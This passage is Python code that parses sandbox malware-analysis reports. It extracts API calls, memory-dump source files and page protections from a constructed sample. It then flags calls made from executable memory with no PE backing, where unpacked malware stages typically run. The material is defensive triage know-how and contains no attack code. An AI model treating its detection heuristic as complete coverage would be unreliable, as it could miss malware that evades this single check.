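    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0  # any of the four PAGE_EXECUTE* values

API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(true|false)$")
FIELD_RE = re.compile(r"^•\s*(Opcode ID|Instruction ID|Opcode Fuzzy Hash|"
                      r"Instruction Fuzzy Hash|API ID|API String ID|String ID):\s*(.*)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%$")

# Constructed sample in the report's layout; the "Uniqueness Score" line closes each entry.
SAMPLE = """\
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02965422
Memory Dump Source
• Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 7d17e9506486b9e1be4eba2faf232bfd0184802ccee929926a8c7d5dee7d3367
• Instruction ID: d6f40d8983faa1ebf10a784a7b5958c5df7988fe25e0152c35e3f5602c8288db
Uniqueness Score: -1.00%
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02966E6F
• Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
• Opcode ID: de3c6884e1dcd1977c13069b08d78ee911b61d4bd9ebcc0f865cc9cc4f57c464
• Instruction ID: 7c73d71f47ddd77dc2f51c66be7754dcff028ecad1e7e122426475c7db517716
Uniqueness Score: -1.00%
• Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
• Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
• Instruction ID: a2b1ecedb8116ce03d5469d623e0bd126ea818936ee2a4e82d2d53d3220e12fc
Uniqueness Score: -1.00%
• Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
• Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
• Instruction ID: 079f76eb5099d8e95398e3fbe363bdedc08def69b96ca4901c4238a53abfa4e0
Uniqueness Score: -1.00%
"""


def parse_source_file(name: str) -> Dict[str, object]:
    """Split 'PID.index.timestamp.BASE.PROTECTION.type.sdmp' into hex-decoded fields."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 6:
        raise ValueError(f"unexpected dump name: {name}")
    prot = int(parts[4], 16)
    return {"pid": int(parts[0], 16), "base": int(parts[3], 16), "protection": prot,
            "protection_name": PAGE_PROTECTION.get(prot, f"0x{prot:x}")}


def parse_entries(text: str) -> List[Dict[str, object]]:
    """One dict per function entry, keyed by the report's own field names."""
    entries, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := API_RE.match(line):
            cur["apis"].append({"api": m.group(1), "module": m.group(2),
                                "args": m.group(3), "ref": int(m.group(4), 16)})
        elif m := SOURCE_RE.match(line):
            cur["source_file"], cur["offset"] = m.group(1), int(m.group(2), 16)
            cur["pe_backed"] = m.group(3) == "true"
            cur.update(parse_source_file(m.group(1)))
        elif m := FIELD_RE.match(line):
            cur[m.group(1).lower().replace(" ", "_")] = m.group(2) or None
        elif m := SCORE_RE.match(line):
            cur["uniqueness_score"] = float(m.group(1))
            entries.append(cur)
            cur = {"apis": []}
    return entries


def shared_opcode_ids(entries) -> Dict[str, List[str]]:
    """Opcode IDs reused by several entries, with the distinct Instruction IDs behind each."""
    seen = defaultdict(set)
    for e in entries:
        if e.get("opcode_id"):
            seen[e["opcode_id"]].add(e.get("instruction_id"))
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def api_calls_from_unbacked_exec_regions(entries) -> List[Tuple[int, str, str, int]]:
    """(pid, module, api, ref) for calls referenced from executable memory with no PE backing."""
    hits = set()
    for e in entries:
        if e.get("pe_backed") is False and e.get("protection", 0) & EXECUTABLE_MASK:
            for a in e["apis"]:
                hits.add((e["pid"], a["module"], a["api"], a["ref"]))
    return sorted(hits)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for pid, mod, api, ref in api_calls_from_unbacked_exec_regions(parsed):
        print(f"pid {pid}: {api} ({mod}) referenced at {ref:08X} from non-PE executable memory")
    for oid, iids in shared_opcode_ids(parsed).items():
        print(f"opcode id {oid[:16]}... shared by {len(iids)} instruction ids")
```

Feed the whole "Executed Functions" section of a report into `parse_entries` to get the same view for every recovered function; the non-PE-backed executable regions are where unpacked stages live, so the API references from them (window creation, handle duplication, pointer encoding, module lookup in this listing) are the ones worth correlating with the behaviour signatures rather than calls from the on-disk image.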

                                                                                                                Non-executed Functions